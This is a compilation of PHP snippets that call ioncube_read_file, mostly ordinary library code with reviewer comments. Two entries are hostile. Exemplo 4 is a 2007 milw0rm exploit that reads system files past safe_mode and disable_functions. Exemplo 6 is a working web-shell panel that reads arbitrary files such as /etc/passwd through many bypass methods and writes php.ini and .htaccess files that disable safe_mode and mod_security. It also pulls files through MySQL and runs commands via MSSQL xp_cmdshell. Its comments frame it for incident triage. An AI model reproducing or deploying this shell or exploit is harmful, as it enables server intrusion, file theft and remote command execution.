Exemplo n.º 1
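 /**
  * Load the document to be parsed from raw data, an open stream, a local file or a URL.
  *
  * SECURITY: when $data_source_type is neither 'raw' nor 'stream', $data_source is
  * handed to file_exists()/file_get_contents()/fopen() as a path or URL. A caller
  * that lets untrusted input reach this argument exposes local files and lets the
  * server fetch arbitrary URLs, so the value must be validated before it gets here.
  *
  * @param mixed  $data_source      Raw content, an open stream resource, or a file path / URL.
  * @param string $data_source_type 'raw', 'stream', or any other value to treat $data_source as a path or URL.
  * @param int    $collapse_dups    Stored on the instance unchanged.
  * @param int    $index_numeric    Stored on the instance unchanged.
  */
 function __construct($data_source, $data_source_type = 'raw', $collapse_dups = 0, $index_numeric = 0)
 {
     $this->collapse_dups = $collapse_dups;
     $this->index_numeric = $index_numeric;
     $this->data = '';
     // Set only when $data_source was used as a path or URL; the ionCube reader
     // below takes a filename and must never be given raw content or a resource.
     $isPathSource = false;
     if ($data_source_type == 'raw') {
         $this->data = $data_source;
     } elseif ($data_source_type == 'stream') {
         while (!feof($data_source)) {
             $chunk = fread($data_source, 1000);
             if ($chunk === false) {
                 // Read error without EOF: stop instead of looping forever.
                 break;
             }
             $this->data .= $chunk;
         }
     } else {
         $isPathSource = true;
         if (file_exists($data_source)) {
             // Local file first.
             $contents = file_get_contents($data_source);
             if ($contents !== false) {
                 $this->data = $contents;
             }
         } else {
             // Not a local file: try it as a URL.
             $fp = fopen($data_source, 'r');
             // fopen() returns false on failure; looping on feof(false) never ends.
             if ($fp !== false) {
                 while (!feof($fp)) {
                     $chunk = fread($fp, 1000);
                     if ($chunk === false) {
                         break;
                     }
                     $this->data .= $chunk;
                 }
                 fclose($fp);
             }
         }
     }
     // Support for encoded files: when the ionCube reader is available, re-read the
     // source through it and keep the result unless it is an integer error code.
     if (function_exists("ioncube_read_file")) {
         if ($isPathSource) {
             $data = ioncube_read_file($data_source);
             if (!is_int($data)) {
                 $this->data = $data;
             }
         }
     } elseif (substr($this->data, 0, 7) == '!odMbo!') {
         // Content carries the '!odMbo!' marker but no reader is installed:
         // send the user to the "loader not installed" page and stop.
         header("Location: " . OPENBIZ_APP_INDEX_URL . '/common/loader_not_installed');
         exit;
     }
 }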
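 /**
  * Return the source text of a file-backed template or config resource.
  *
  * When the ionCube reader is available the file is read through it; an integer
  * result is an error code from the reader and is treated as a failed read
  * rather than being returned as template content.
  *
  * @param Smarty_Template_Source $source source object; timestamp, filepath, type and name are read
  *
  * @return string file contents
  * @throws SmartyException when the source has no timestamp or the ionCube reader reports an error
  */
 public function getContent(Smarty_Template_Source $source)
 {
     if ($source->timestamp) {
         if (!function_exists('ioncube_read_file')) {
             return file_get_contents($source->filepath);
         }
         $content = ioncube_read_file($source->filepath);
         if (!is_int($content)) {
             return $content;
         }
         // Integer error code: fall through to the exception below instead of
         // handing a number back as if it were the template body.
     }
     if ($source instanceof Smarty_Config_Source) {
         throw new SmartyException("Unable to read config {$source->type} '{$source->name}'");
     }
     throw new SmartyException("Unable to read template {$source->type} '{$source->name}'");
 }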
Exemplo n.º 3
 /**
  * Construct an instance of a metadata object.
  *
  * Resolves the class for $objName (from its metadata XML when available,
  * otherwise from the name itself), includes the class file if the class is
  * not loaded yet, and instantiates the class with the XML array.
  *
  * NOTE(review): the class name comes from the XML "CLASS" attribute or from
  * $objName, and is then used for include_once and `new $class(...)`. Confirm
  * that neither object names nor metadata files can be influenced by
  * untrusted input, otherwise this is a dynamic include / instantiation sink.
  *
  * @param string $objName object name, optionally prefixed with a dotted package
  * @param array $xmlArr xml array; passed by reference, its root NAME and PACKAGE attributes are written
  * @return object|null the instance of the object, or null when none was created
  */
 protected function constructObject($objName, &$xmlArr = null)
 {
     if (!$xmlArr) {
         $xmlFile = BizSystem::GetXmlFileWithPath($objName);
         if (!$xmlFile) {
             // No metadata file: split "package.Class" on the last dot.
             // NOTE(review): $classPackage is not assigned on this path but is read further down.
             $dotPos = strrpos($objName, ".");
             $package = $dotPos > 0 ? substr($objName, 0, $dotPos) : null;
             $class = $dotPos > 0 ? substr($objName, $dotPos + 1) : $objName;
         } else {
             $xmlArr = BizSystem::getXmlArray($xmlFile);
         }
     }
     if ($xmlArr) {
         // The first key of the array is treated as the root element.
         $keys = array_keys($xmlArr);
         $root = $keys[0];
         // added by mr_a_ton: the NAME attribute must match the object name
         $dotPos = strrpos($objName, ".");
         $shortObjectName = $dotPos > 0 ? substr($objName, $dotPos + 1) : $objName;
         if ($xmlArr[$root]["ATTRIBUTES"]["NAME"] == "") {
             // Empty NAME: fill it in from the object name.
             $xmlArr[$root]["ATTRIBUTES"]["NAME"] = $shortObjectName;
         } else {
             if ($shortObjectName != $xmlArr[$root]["ATTRIBUTES"]["NAME"]) {
                 trigger_error("Metadata file parsing error for object {$objName}. Name attribut [" . $xmlArr[$root]["ATTRIBUTES"]["NAME"] . "] not same with object name. Please double check your metadata xml file again.", E_USER_ERROR);
             }
         }
         //$package = $xmlArr[$root]["ATTRIBUTES"]["PACKAGE"];
         $class = $xmlArr[$root]["ATTRIBUTES"]["CLASS"];
         // if class has package name as prefix, change the package to the prefix
         $dotPos = strrpos($class, ".");
         $classPrefix = $dotPos > 0 ? substr($class, 0, $dotPos) : null;
         $classPackage = $classPrefix ? $classPrefix : null;
         if ($classPrefix) {
             $class = substr($class, $dotPos + 1);
         }
         // set object package
         $dotPos = strrpos($objName, ".");
         $package = $dotPos > 0 ? substr($objName, 0, $dotPos) : null;
         // A leading '@' on the package is dropped.
         if (strpos($package, '@') === 0) {
             $package = substr($package, 1);
         }
         // Without a class prefix, the class is looked up in the object's package.
         if (!$classPackage) {
             $classPackage = $package;
         }
         $xmlArr[$root]["ATTRIBUTES"]["PACKAGE"] = $package;
     }
     if ($class == "BizObj") {
         // convert BizObj to BizDataObj, support <1.2 version
         $class = "BizDataObj";
     }
     // class_exists(..., false): do not trigger autoloading; the file is located and included here.
     if (!class_exists($class, false)) {
         $classFile = BizClassLoader::getLibFileWithPath($class, $classPackage);
         if (!$classFile) {
             if ($package) {
                 trigger_error("Cannot find the class with name as {$package}.{$class}", E_USER_ERROR);
             } else {
                 trigger_error("Cannot find the class with name as {$class} of {$objName}", E_USER_ERROR);
             }
             exit;
         }
         include_once $classFile;
     }
     if (class_exists($class, false)) {
         //if ($objName == "collab.calendar.form.EventListForm") { print_r($xmlArr); exit; }
         $obj_ref = new $class($xmlArr);
         if ($obj_ref) {
             return $obj_ref;
         }
     } else {
         // The include did not define the class. With the ionCube reader available,
         // report an error unless the file text contains "ionCube Loader".
         // NOTE(review): !strpos() is also true when the match is at offset 0 — confirm intent.
         if (function_exists("ioncube_read_file")) {
             $data = ioncube_read_file($classFile);
             if (!strpos($data, "ionCube Loader")) {
                 trigger_error("Cannot find the class with name as {$class} in {$classFile}", E_USER_ERROR);
             } else {
             }
         }
     }
     return null;
 }
Exemplo n.º 4
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//Technical details:
//ionCube version: 6.5
//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
//url: www.ioncube.com
//php.ini settings:
//safe_mode = On
//disable_functions = ioncube_read_file, readfile
//Description:
//This is useful to obtain juicy informations but also to retrieve source
//code of php pages, password files, etc... you just need to change file path.
//Anyway, don't worry, nobody will read your obfuscated code :)
//greetz to: BlackLight for help me to understand better PHP
//P.S.
//This extension contains even an interesting ioncube_write_file function...
// Stop when the ionCube Loader extension is not loaded; the call under test
// below is provided by that extension.
if (!extension_loaded("ionCube Loader")) {
    die("ionCube Loader extension required!");
}
// Relative prefix made of twenty "..\" segments.
$path = str_repeat("..\\", 20);
// Control case: readfile is listed in disable_functions in the header above.
// readfile() writes to output itself and returns a byte count or false, so
// this variable holds that return value, not file contents.
$MyBoot_readfile = readfile($path . "windows\\system.ini");
#just to be sure that I set correctely disable_function :)
// Case under test: ioncube_read_file is also listed in disable_functions in
// the header. The author reports that this call still returned file contents
// with the loader build named above.
// NOTE(review): for defenders, this means safe_mode/disable_functions should not
// be relied on to contain file readers supplied by an extension — verify the
// behaviour against the loader version actually deployed.
$MyBoot_ioncube = ioncube_read_file($path . "boot.ini");
echo $MyBoot_readfile;
echo "<br><br>ionCube output:<br><br>";
echo $MyBoot_ioncube;
?>

# milw0rm.com [2007-10-11]
Exemplo n.º 5
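 /**
  * Work out whether the given file is an encoded/encrypted ionCube file.
  *
  * The file extension is not tested; the calling method is expected to have
  * done that already.
  *
  * Two checks are made: an integer result from ioncube_read_file() is treated
  * as "encoded", and otherwise the first line is compared with the
  * '<?php //0' header. A file that cannot be opened for the second check is
  * reported as not encoded.
  *
  * NOTE(review): any integer error from the reader counts as "encoded" here;
  * confirm that is intended for errors unrelated to encoding.
  *
  * @param string $filename Filename, with path, to check
  *
  * @return boolean True if file was encoded/encrypted
  */
 private function checkFileCoding($filename)
 {
     // Ask the ionCube reader first, when the loader provides it; without the
     // guard a missing loader would end in an undefined-function fatal error.
     if (function_exists('ioncube_read_file')) {
         $ioncube = ioncube_read_file($filename, $ioncubeType);
         if (is_int($ioncube)) {
             // we got an error from ioncube, so it's encrypted
             return true;
         }
     }
     // read first line of file
     $f = fopen($filename, 'r');
     if ($f === false) {
         // Unreadable file: nothing to inspect, and fgets(false) would fail.
         return false;
     }
     // fgets() returns false on an empty file; cast so trim() always gets a string.
     $line = trim((string) fgets($f, 32));
     fclose($f);
     // if first line is longer than 30, then this isn't a php file
     if (strlen($line) > 30) {
         return false;
     }
     // a first line starting '<?php //0' is a strong sign the file is encoded;
     // anything else is most likely un-encrypted/un-encoded
     return substr($line, 0, 9) === '<?php //0';
 }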
Exemplo n.º 6
/**
 * NOTE(review): this is a web-shell panel, not application code. Nothing in
 * this function checks who the caller is; every action is selected and
 * parameterised by $_REQUEST values.
 *
 * Branches visible here, selected by request key:
 *  - read:   prints the file named by $_REQUEST['file'] through a series of
 *            different PHP functions, one numbered "Method" per attempt.
 *  - show:   lists paths that start with the 'file' value.
 *  - create: writes php.ini, ini.ini and .htaccess next to this script.
 *  - sql:    loads the file into a temporary MySQL table using the supplied
 *            credentials and prints the rows.
 *  - serveR + coM + dB + useR + pasS: passes the supplied command to MSSQL
 *            and prints the rows that come back.
 * The function always ends by printing the HTML forms that drive these branches.
 *
 * For triage, the artefacts this code touches on disk are php.ini, ini.ini and
 * .htaccess in the script directory, /tmp/mb_send_mail, a short-lived entry
 * prefixed "lnk_" and a tempnam() file prefixed "cx" that is not removed.
 *
 * checkfunctioN, whereistmP, shelL, comshelL, winshelL and srvshelL are
 * defined outside this view.
 */
function safemodE()
{
    global $windows, $hcwd;
    // Target path comes straight from the request; default is /etc/passwd.
    $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
    // Markup fragments wrapped around each "Method N:(name)" heading.
    $pr = "\r\n</font><font color=green>Method ";
    $po = ")</font><font color=#FA0>\r\n";
    $i = 1;
    if (!empty($_REQUEST['read'])) {
        // "read" branch: the same file is output through one API after another.
        echo "<pre>{$pr}{$i}:(ini_restore{$po}";
        ini_restore('safe_mode');
        ini_restore('open_basedir');
        readfile($file);
        $i++;
        if (checkfunctioN("ioncube_read_file")) {
            echo "{$pr}{$i}:(ionCube{$po}";
            echo ioncube_read_file($file);
            $i++;
        }
        if (checkfunctioN('symlink')) {
            echo "{$pr}{$i}:(symlink{$po}";
            $lnk = whereistmP() . DIRECTORY_SEPARATOR . uniqid('lnk_');
            @symlink($file, $lnk);
            @readfile($lnk);
            @unlink($lnk);
            $i++;
        }
        echo "{$pr}{$i}:(include{$po}";
        // The request-supplied path is included, i.e. executed as PHP if it contains any.
        include $file;
        $i++;
        echo "{$pr}{$i}:(copy{$po}";
        $tmp = tempnam('', 'cx');
        copy('compress.zlib://' . $file, $tmp);
        $fh = fopen($tmp, 'r');
        $data = fread($fh, filesize($tmp));
        fclose($fh);
        echo $data;
        $i++;
        if (checkfunctioN('mb_send_mail')) {
            echo "{$pr}{$i}:(mb_send_mail{$po}";
            if (file_exists('/tmp/mb_send_mail')) {
                unlink('/tmp/mb_send_mail');
            }
            mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
            readfile('/tmp/mb_send_mail');
            $i++;
        }
        if (checkfunctioN('curl_init')) {
            echo "{$pr}{$i}:(curl_init [A]{$po}";
            $fh = curl_init('file://' . $file . '');
            $tmp = curl_exec($fh);
            echo $tmp;
            $i++;
            echo "{$pr}{$i}:(curl_init [B]{$po}";
            $i++;
            if (strstr($file, DIRECTORY_SEPARATOR)) {
                $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
            } else {
                $ch = curl_init('file://' . $file . "" . __FILE__);
            }
            var_dump(curl_exec($ch));
        }
        // The request-supplied path is placed into a shell command line.
        if ($windows) {
            echo "{$pr}{$i}:(shell{$po}";
            echo shelL("type \"{$file}\"");
            $i++;
        } else {
            echo "{$pr}{$i}:(shell{$po}";
            echo shelL("cat {$file}");
            $i++;
        }
        if (checkfunctioN('imap_open')) {
            echo "{$pr}{$i}:(imap [A]{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $list = imap_list($str, $file, '*');
            for ($i = 0; $i < count($list); $i++) {
                echo $list[$i] . "\n";
            }
            imap_close($str);
            $i++;
            echo "{$pr}{$i}:(imap [B]{$po}";
            $str = imap_open($file, '', '');
            $tmp = imap_body($str, 1);
            echo $tmp;
            imap_close($str);
            $i++;
        }
        if ($file == '/etc/passwd') {
            // Only for the default target: prints account entries looked up by numeric uid.
            echo "{$pr}{$i}:(posix{$po}";
            for ($uid = 0; $uid < 99999; $uid++) {
                $h = posix_getpwuid($uid);
                if (!empty($h)) {
                    foreach ($h as $k => $v) {
                        echo "{$v}";
                        if ($k != 'shell') {
                            echo ":";
                        }
                    }
                    echo "\r\n";
                }
            }
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['show'])) {
        // "show" branch: directory listing for the request-supplied prefix.
        echo "<pre>{$pr}{$i}:(glob{$po}";
        $con = glob("{$file}*");
        foreach ($con as $v) {
            echo "{$v}\n";
        }
        $i++;
        if (checkfunctioN('imap_open')) {
            echo "{$pr}{$i}:(imap{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $s = explode("|", $file);
            if (count($s) > 1) {
                $list = imap_list($str, trim($s[0]), trim($s[1]));
            } else {
                $list = imap_list($str, trim($str[0]), '*');
            }
            for ($i = 0; $i < count($list); $i++) {
                echo "{$list[$i]}\r\n";
            }
            imap_close($str);
            $i++;
        }
        if (class_exists('COM')) {
            echo "{$pr}{$i}:(COM{$po}";
            $ws = new COM('WScript.Shell');
            $exec = comshelL("dir \"{$file}\"", $ws);
            $exec = str_replace("\t", '', $exec);
            echo $exec;
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("dir \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("dir \"{$file}\"");
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['create'])) {
        // "create" branch: writes three config files into the script's own directory.
        // Unexpected php.ini / ini.ini / .htaccess files with this content are an
        // indicator worth checking for during incident response.
        $i = 1;
        $dir = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        if (is_writable($dir)) {
            echo "<pre>{$pr}{$i}:(php.ini{$po}";
            file_put_contents($dir . 'php.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
            echo "\nphp.ini created!\n";
            $i++;
            echo "{$pr}{$i}:(ini.ini{$po}";
            file_put_contents($dir . 'ini.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
            echo "\nini.ini created!\n";
            $i++;
            echo "{$pr}{$i}:(.htaccess{$po}";
            file_put_contents($dir . '.htaccess', "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckCookieFormat Off\r\nSecFilterNormalizeCookies Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>");
            echo "\n.htaccess created!\n";
            echo "\nCheck if safe-mode is off.\n</pre></font>";
        } else {
            echo "Local directory is not writable!";
        }
    } elseif (!empty($_REQUEST['sql'])) {
        // "sql" branch: connects to MySQL on localhost with request-supplied
        // credentials and reads the file through a temporary table.
        $ta = uniqid('N');
        $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
        $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
        mysql_select_db($_REQUEST['db'], $l);
        echo '<pre><font color=#FA0>';
        foreach ($s as $v) {
            $q = mysql_query($v, $l);
            while ($d = mysql_fetch_row($q)) {
                echo htmlspecialchars($d[0]);
            }
        }
        echo '</pre></font>';
    } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
        // MSSQL branch: the request-supplied command string is concatenated into
        // an xp_cmdshell call; output is collected through a table named with an "NJ" prefix.
        $res = '';
        $tb = uniqid('NJ');
        $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
        mssql_select_db($_REQUEST['dB'], $db);
        mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
        mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
        $re = mssql_query("select * from {$tb}", $db);
        while ($row = mssql_fetch_row($re)) {
            $res .= $row[0] . "\r\n";
        }
        mssql_query("drop table {$tb}", $db);
        mssql_close($db);
        echo "<div align=center><textarea rows='18' cols='64'>{$res}</textarea></div><br>";
    }
    // Values echoed back into the forms below are passed through htmlspecialchars() first.
    $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
    $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'root';
    $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
    $d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
    echo '
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Disable safe-mode & mod_sec</label>
</div><div class="fieldwrapper">
<label class="styled">Create config files:</label>
<div class="thefield">
php.ini<br />
ini.ini<br />
.htaccess<br />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="create" value="Create" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use PHP Bugs</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="read" value="Read File" style="margin-left: 150px;" />
</div>
<div class="buttonsdiv">
<input type="submit" name="show" value="List directory" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client1" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use MySQL</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" value="' . $u . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pass" value="' . $p . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="db" value="' . $d . '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="sql" value="Read" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client2" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">MSSQL Exec</label>
</div><div class="fieldwrapper">
<label class="styled">Server:</label>
<div class="thefield">
<input type="text" name="serveR" value="';
    if (!empty($_REQUEST['serveR'])) {
        echo htmlspecialchars($_REQUEST['serveR']);
    } else {
        echo 'localhost';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="useR" value="';
    if (!empty($_REQUEST['useR'])) {
        echo htmlspecialchars($_REQUEST['useR']);
    } else {
        echo 'sa';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pasS" value="';
    if (!empty($_REQUEST['pasS'])) {
        echo htmlspecialchars($_REQUEST['pasS']);
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Command:</label>
<div class="thefield">
<input type="text" name="coM" value="';
    if (!empty($_REQUEST['coM'])) {
        echo htmlspecialchars($_REQUEST['coM']);
    } else {
        echo 'dir c:';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="dB" value="';
    if (!empty($_REQUEST['dB'])) {
        echo htmlspecialchars($_REQUEST['dB']);
    } else {
        echo 'master';
    }
    echo '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" value="Execute" style="margin-left: 150px;" />
</div>
</form>
';
}
Exemplo n.º 7
 /**
  * VQMod::_getMods()
  *
  * Refreshes the list of mod XML files, tracks the newest modification time
  * among them and the xml folder, then either restores the parsed mods from
  * the cache file or parses the XML files again.
  *
  * NOTE(review): the cache file contents are passed to unserialize(). Anyone
  * able to write that file controls the objects created here, so the cache
  * location must not be writable by less trusted users or processes.
  *
  * @return null
  */
 private function _getMods()
 {
     $this->_modFileList = $this->_getModFileList();

     // Newest mtime among the mod files that still exist.
     foreach ($this->_modFileList as $modFile) {
         if (!file_exists($modFile)) {
             continue;
         }
         $modifiedAt = filemtime($modFile);
         if ($modifiedAt > $this->_lastModifiedTime) {
             $this->_lastModifiedTime = $modifiedAt;
         }
     }

     // The xml folder's own mtime counts too.
     $folderModifiedAt = filemtime($this->path('ext/vqmod/xml'));
     if ($folderModifiedAt > $this->_lastModifiedTime) {
         $this->_lastModifiedTime = $folderModifiedAt;
     }

     $cachePath = $this->path($this->modCache);
     if ($this->_devMode || !file_exists($cachePath)) {
         $this->_lastModifiedTime = time();
     } elseif (file_exists($cachePath) && filemtime($cachePath) >= $this->_lastModifiedTime) {
         // Cache is at least as new as every input: try to load it.
         if (!function_exists('ioncube_read_file')) {
             $serialized = file_get_contents($cachePath);
         } else {
             $serialized = ioncube_read_file($cachePath);
             // An integer is an error code from the reader, not content.
             if (is_int($serialized)) {
                 $serialized = false;
             }
         }
         if (!empty($serialized)) {
             $this->_mods = unserialize($serialized);
         }
         if ($this->_mods !== false) {
             return;
         }
     }

     // No usable cache: parse the XML files, or log that there are none.
     if (!$this->_modFileList) {
         $this->log->write('NO MODS IN USE');
         return;
     }
     $this->_parseMods();
 }
Exemplo n.º 8
 /**
  * Read a file and return its contents.
  *
  * Uses ioncube_read_file() when that function exists, otherwise a plain
  * binary read. An integer result from the ionCube reader is treated as failure.
  *
  * @param string $filename path of the file to read
  *
  * @return string|false contents, '' for a zero-length file on the plain path, or false on failure
  */
 function _read_file($filename)
 {
     if (!file_exists($filename)) {
         return false;
     }
     if (function_exists('ioncube_read_file')) {
         $contents = ioncube_read_file($filename);
         return is_int($contents) ? false : $contents;
     }
     // Plain read; open errors are suppressed and reported as false.
     $handle = @fopen($filename, 'rb');
     if (!$handle) {
         return false;
     }
     $length = filesize($filename);
     $contents = $length ? fread($handle, $length) : '';
     fclose($handle);
     return $contents;
 }